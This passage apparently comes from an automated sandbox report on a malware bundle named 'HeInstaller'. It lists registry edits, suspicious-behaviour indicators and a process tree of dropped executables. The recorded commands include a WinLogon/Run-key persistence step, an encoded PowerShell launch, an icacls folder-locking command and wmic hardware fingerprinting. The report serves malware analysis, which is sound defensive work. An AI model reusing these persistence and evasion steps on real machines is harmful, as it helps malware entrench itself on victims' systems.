Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\msn.com\NumberOfSubdomains = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 54cf6c05da5dd901	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000001edcd5c66802770eb07ba0782b4cada94626dbeffcb384d9cdb65ecf5baafcdea7db8e7fd323c40648b7d070b2b837442580c32291c5ce926721fc9de68be1b35ad810b93b4eead616d8d9a23e3825333a884a88f9c9b9446f64	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6036 PING.EXE

pid	process
6036	PING.EXE

Suspicious behavior: EnumeratesProcesses 51 IoCs

Processes:

chrome.exechrome.exevbc.exepowershell.exestpoeoeiej.exeFRec323.exestpoeoeiej.exeSetuр.exefb94349c162808651fb84b58e6881eb0.exe

pid	process
4484	chrome.exe
4484	chrome.exe
1256	chrome.exe
1256	chrome.exe
4876	vbc.exe
1324	powershell.exe
1324	powershell.exe
1324	powershell.exe
1324	powershell.exe
3760	stpoeoeiej.exe
3760	stpoeoeiej.exe
3708	FRec323.exe
3708	FRec323.exe
3708	FRec323.exe
3708	FRec323.exe
3708	FRec323.exe
3708	FRec323.exe
1792	stpoeoeiej.exe
1792	stpoeoeiej.exe
812	Setuр.exe
812	Setuр.exe
3420	fb94349c162808651fb84b58e6881eb0.exe
3420	fb94349c162808651fb84b58e6881eb0.exe
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240
3240

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

HeInstaller.exe

pid process

3712 HeInstaller.exe
Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

MicrosoftEdgeCP.exefb94349c162808651fb84b58e6881eb0.exe

pid process

372 MicrosoftEdgeCP.exe
372 MicrosoftEdgeCP.exe
372 MicrosoftEdgeCP.exe
372 MicrosoftEdgeCP.exe
3420 fb94349c162808651fb84b58e6881eb0.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

chrome.exe

pid process

4484 chrome.exe
4484 chrome.exe
4484 chrome.exe
4484 chrome.exe
4484 chrome.exe

pid	process
372	MicrosoftEdgeCP.exe
372	MicrosoftEdgeCP.exe
372	MicrosoftEdgeCP.exe
372	MicrosoftEdgeCP.exe
3420	fb94349c162808651fb84b58e6881eb0.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe
Token: SeShutdownPrivilege	4484	chrome.exe
Token: SeCreatePagefilePrivilege	4484	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.exe

pid	process
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe
4484	chrome.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

HeInstaller.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exefile.exeis-EQJB1.tmpFRec323.exe

pid	process
3712	HeInstaller.exe
3712	HeInstaller.exe
2188	MicrosoftEdge.exe
372	MicrosoftEdgeCP.exe
372	MicrosoftEdgeCP.exe
1704	MicrosoftEdgeCP.exe
3448	file.exe
1540	is-EQJB1.tmp
3708	FRec323.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4484 wrote to memory of 5104	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 5104	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4356	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 5068	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 5068	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe
PID 4484 wrote to memory of 4968	4484	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\HeInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\HeInstaller.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3712

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4656

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New folder\HeInstaller\txt.txt
1⤵
PID:2516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe925f9758,0x7ffe925f9768,0x7ffe925f9778
2⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:2
2⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:5068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:4968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2908 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:1
2⤵
PID:436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2884 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:1
2⤵
PID:516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3764 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:1
2⤵
PID:2680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4460 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:2528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4860 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:3704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:5080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2476 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:1
2⤵
PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5024 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:1
2⤵
PID:3928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:8
2⤵
PID:2112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3116 --field-trial-handle=1772,i,5858752665777705131,8818744895079377311,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1256

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:932

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2188

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:372

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:3852

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3020

C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1768

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4876

C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe"
1⤵
- Executes dropped EXE
PID:2056

C:\Users\Public\olov.exe
C:\Users\Public\olov.exe
2⤵
- Executes dropped EXE
PID:964

C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe"
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1324

C:\Users\Admin\AppData\Local\Temp\Fvryllwsales.exe
"C:\Users\Admin\AppData\Local\Temp\Fvryllwsales.exe"
2⤵
- Executes dropped EXE
PID:2540

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
2⤵
PID:3032

C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe"
1⤵
- Executes dropped EXE
- Maps connected drives based on registry
PID:1752

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic csproduct get uuid
2⤵
PID:4504

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2532

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2576

C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5080

C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:3760

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\ff5c3531-a01a-4c50-9c95-ad3eb0ab17e2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:2772

C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:4512

C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1792

C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build2.exe
"C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build2.exe"
5⤵
PID:3524

C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build2.exe
"C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build2.exe"
6⤵
- Executes dropped EXE
